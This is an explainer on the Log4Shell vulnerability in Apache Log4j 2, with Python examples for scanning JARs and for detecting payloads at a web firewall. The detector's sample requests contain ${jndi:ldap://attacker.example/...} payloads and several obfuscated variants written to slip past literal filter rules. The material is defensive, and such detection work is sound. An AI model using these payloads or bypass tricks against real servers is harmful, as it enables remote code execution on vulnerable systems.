Log4j Vulnerability
A vulnerability has been found in Apache Log4j, a widely used logging package for Java. The vulnerability, which allows an attacker to execute arbitrary code by getting a crafted string into a log message, has been identified as CVE-2021-44228 and given the name Log4Shell.
It was reported to Apache by Chen Zhaojun of the Alibaba Cloud Security Team and became widely known after LunaSec's write-up, which coined the name Log4Shell, and after early exploitation of Minecraft: Java Edition servers through in-game chat messages.
Log4j 2 versions 2.0-beta9 through 2.14.1 are affected (the backport releases 2.12.2, 2.12.3 and 2.3.1 cut after the fix are not), which takes in the many Java services and applications that depend on Log4j 2 directly or through a transitive dependency. Log4j 1.x does not contain the JNDI lookup and is not affected by this CVE, although it is end-of-life and has its own issues. The fix released as 2.15.0 was followed by further CVEs (CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832), so the fully patched versions are 2.17.1 (Java 8 and later), 2.12.4 (Java 7) and 2.3.2 (Java 6).
CVE-2021-44228 :-
Apache Log4j2 versions up to and including 2.14.1 do not protect the JNDI features used in configuration, log messages and parameters against attacker-controlled LDAP and other JNDI-related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP (or other JNDI) servers when message lookup substitution is enabled. The trigger is a lookup string such as ${jndi:ldap://host/path} landing in any logged field, for example a User-Agent header or a username.
From Log4j 2.15.0 this behaviour is disabled by default. In releases 2.10 through 2.14.1 it can be mitigated by setting the system property "log4j2.formatMsgNoLookups" to "true" (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS); in releases before 2.10 it can be mitigated by removing the JndiLookup class from the classpath. Apache later found the formatMsgNoLookups setting insufficient (CVE-2021-45046), so the class removal, or better an upgrade to a fixed release, is the mitigation to rely on.
Finding Log4j with open source tools :-
1. Syft : a tool that can discern which version of Log4j a Java application contains. The Log4j JAR can be included directly in the project or hidden inside one of its dependencies (for example repackaged in an uber JAR), so the check has to look past the top-level dependency list.
Running Syft against a sample Java project reports the Log4j version present, which tells us whether it falls in the vulnerable range.
Syft generates a software bill of materials (SBOM), and there is value in generating and storing an SBOM for every software component or application you deliver. When a new vulnerability such as Log4Shell is found, it is much faster to search a repository of SBOMs than to find and scan all of your Java applications.
2. Grype : a scanner that reports which specific vulnerabilities our software contains.
When you include a dependency in your application, Grype also identifies the vulnerabilities of that dependency's own dependencies, and so on through multiple levels of nesting.
Grype can scan the software directly or scan the SBOM produced by Syft. Scanning the SBOM lets you re-check for new vulnerabilities even after the software has been deployed or delivered to customers.
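Below is an added Python example (not from this page, and not Anchore's Syft or Grype code) that does offline what the two tools automate: it reads the log4j-core version from META-INF/maven/.../pom.properties inside a JAR, recurses into JARs nested inside it, checks the version against the range affected by CVE-2021-44228 and records whether JndiLookup.class is still present. It also rewrites a JAR without that class, which is the class-removal mitigation from the CVE section above (the same effect as Apache's zip -q -d ... JndiLookup.class command). The sample JARs are constructed in memory; the Finding class, the version tuples and the status strings are this example's own conventions.

```python
"""Offline check of JAR files for a vulnerable log4j-core, using the same evidence Syft (version
from pom.properties) and Grype (version against the affected range) use. Added example, not
Anchore's code; sample JARs are constructed in memory."""
import io
import re
import zipfile
from dataclasses import dataclass

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, '', 0); '2.0-beta9' -> (2, 0, 0, 'beta', 9); None if unparsable."""
    m = VERSION_RE.fullmatch(text.strip())
    if m is None:
        return None
    major, minor, patch, tag, tagnum = m.groups()
    return (int(major), int(minor), int(patch or 0), (tag or "").lower(), int(tagnum or 0))


def vulnerable_to_44228(v):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1, minus the backport releases
    (2.3.1+, 2.12.2+) that were cut after the fix."""
    major, minor, patch, tag, tagnum = v
    if major != 2:
        return False  # log4j 1.x has no JndiLookup; this CVE does not apply (1.x has others)
    if (minor, patch) == (0, 0) and tag:  # 2.0-alpha/beta/rc pre-releases
        return tag == "rc" or (tag == "beta" and tagnum >= 9)
    if (minor, patch) in {(3, 1), (3, 2), (12, 2), (12, 3), (12, 4)}:
        return False
    return (minor, patch) <= (14, 1)


def assess(version, has_jndi_lookup):
    """Combine the version with the presence of JndiLookup.class into one verdict."""
    v = parse_version(version)
    if v is None:
        return "unknown version; JndiLookup present, treat as vulnerable" if has_jndi_lookup else "unknown"
    if v[0] != 2:
        return "not log4j 2.x; CVE-2021-44228 does not apply"
    if vulnerable_to_44228(v):
        return "VULNERABLE (CVE-2021-44228)" if has_jndi_lookup else "MITIGATED (JndiLookup.class removed)"
    if (v[1], v[2]) >= (17, 1) or (v[1], v[2]) in {(12, 4), (3, 2)}:
        return "fixed"
    return "fixed for CVE-2021-44228; follow-up CVEs may remain, upgrade to 2.17.1, 2.12.4 or 2.3.2"


@dataclass
class Finding:
    path: str
    version: str
    has_jndi_lookup: bool
    status: str


def scan_jar(data, path, findings=None):
    """Walk a JAR, and every JAR nested inside it (uber and Spring Boot jars), for log4j-core."""
    findings = [] if findings is None else findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = ""
        for name in names:
            if POM_PROPS.search(name):
                for line in zf.read(name).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version or has_jndi:
            findings.append(Finding(path, version or "?", has_jndi, assess(version, has_jndi)))
        for name in names:
            if name.endswith((".jar", ".war", ".ear")):
                scan_jar(zf.read(name), f"{path}!{name}", findings)
    return findings


def strip_jndi_lookup(data):
    """Rewrite a top-level JAR without JndiLookup.class (what 'zip -q -d' does)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    return out.getvalue()


def build_sample_jar(version, include_jndi=True, nested_in=None):
    """Constructed fixture: a minimal log4j-core-like JAR, optionally wrapped in an outer JAR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
    data = buf.getvalue()
    if nested_in:
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as zf:
            zf.writestr(nested_in, data)
        data = outer.getvalue()
    return data


if __name__ == "__main__":
    app = build_sample_jar("2.14.1", nested_in="BOOT-INF/lib/log4j-core-2.14.1.jar")
    for f in scan_jar(app, "app.jar"):
        print(f)
    print(scan_jar(strip_jndi_lookup(build_sample_jar("2.14.1")), "log4j-core-2.14.1.jar")[0].status)
```

The nested case is the one worth noticing: the outer app.jar carries no pom.properties of its own, so a tool that only reads the top-level manifest reports nothing, while walking into BOOT-INF/lib finds the vulnerable copy. With the real tools the equivalent is roughly `syft dir:. -o json > sbom.json` followed by `grype sbom:sbom.json`, and the SBOM can be re-scanned later without re-fetching the application. Note that a JAR whose JndiLookup.class has been stripped is only mitigated for CVE-2021-44228; it still reports the old version and should be upgraded.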
How to Mitigate the Exploit :-
The quickest way to block malicious requests while the library is being upgraded is a web application firewall (WAF).
It inspects every incoming request for indications of CVE-2021-44228 by comparing the request data (headers, query strings and bodies alike, since any field that ends up in a log line is a vector) against a set of precompiled rules.
However, updating WAF rules after a zero-day exploit is an arms race. As soon as WAF rules are available for a given exploit, attackers look for techniques and patterns that bypass them; for Log4Shell that meant nested lookups such as ${${lower:j}ndi:...} and percent-encoded payloads, which a literal match on ${jndi: never sees.
Keep WAF rules up to date, and treat the WAF as a stopgap rather than the fix: the fix is upgrading Log4j (2.17.1 or later) or removing the JndiLookup class.
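The following added Python example (not from this page, and not from any WAF product) shows both the lookup substitution described in the CVE section and why the WAF arms race happens. It re-implements the part of Log4j's lookup syntax that the bypasses depend on (innermost-first evaluation of nested ${...}, the lower and upper lookups, and the :-default form) so that an obfuscated payload collapses to ${jndi:...} before a rule is applied, and contrasts that with the first-generation literal signature. The HTTP requests and the host attacker.example are constructed; naive_rule, resolve_lookups and jndi_targets are this example's own names.

```python
"""WAF-side detection of CVE-2021-44228 payloads. Added example, not from the page or a WAF
vendor. Nested ${...} lookups are resolved the way log4j-core's substitutor does (innermost
first, lower/upper lookups, ':-' defaults) so obfuscated payloads collapse to ${jndi:...}."""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")  # a ${...} whose body holds no further ${ }: innermost first

# Constructed sample requests: one benign, one plain payload, three obfuscations of the kind
# seen after the first WAF rules shipped, and a non-JNDI lookup that must not be flagged.
REQUESTS = [
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: ${jndi:ldap://attacker.example/a}\r\n",
    "GET / HTTP/1.1\r\nX-Api-Version: ${${lower:j}ndi:${lower:l}dap://attacker.example/a}\r\n",
    "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1\r\n",
    "GET / HTTP/1.1\r\nReferer: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.example/a}\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: ${date:yyyy}\r\n",
]


def naive_rule(request):
    """The first-generation signature: a literal '${jndi:' anywhere in the raw request."""
    return "${jndi:" in request.lower()


def resolve_lookups(text):
    """Return (resolved_text, jndi_targets) after evaluating nested lookups innermost-first."""
    targets = []
    for _ in range(500):  # bound the work on hostile input (Log4j itself caps recursion depth)
        m = INNER.search(text)
        if m is None:
            break
        body = m.group(1)
        expr, has_default, default = body.partition(":-")  # ${lookup:-default} syntax
        prefix, sep, key = expr.partition(":")
        prefix = prefix.lower()  # Log4j lower-cases the lookup name before dispatch
        if sep and prefix == "jndi":
            targets.append(key)  # this is the point where log4j-core would contact the server
            value = "<jndi>"
        elif sep and prefix == "lower":
            value = key.lower()
        elif sep and prefix == "upper":
            value = key.upper()
        elif has_default:
            value = default  # env/sys/ctx/... treated as unset, so the default is what Log4j uses
        else:
            value = "\u00ab" + body + "\u00bb"  # unresolved lookup: keep visible, not re-matchable
        text = text[: m.start()] + value + text[m.end():]
    return text, targets


def jndi_targets(request):
    """Decode percent-encoding (a WAF must normalise before matching), then resolve lookups."""
    return resolve_lookups(unquote(request))[1]


if __name__ == "__main__":
    for req in REQUESTS:
        print(f"naive={naive_rule(req)!s:5} resolved={jndi_targets(req)}  {req.splitlines()[-1]!r}")
```

Run stand-alone, the literal rule catches only the plain payload, while resolving the lookups flags all four malicious requests and leaves the benign ${date:yyyy} alone. The caveat is the arms-race point from the text: this resolver only knows the lookups whose result does not depend on the target host. Anything that reads server state (${sys:...}, ${env:...} values that happen to be set, ${ctx:...}) cannot be evaluated by a WAF, so a WAF rule buys time and the upgrade is what closes the hole.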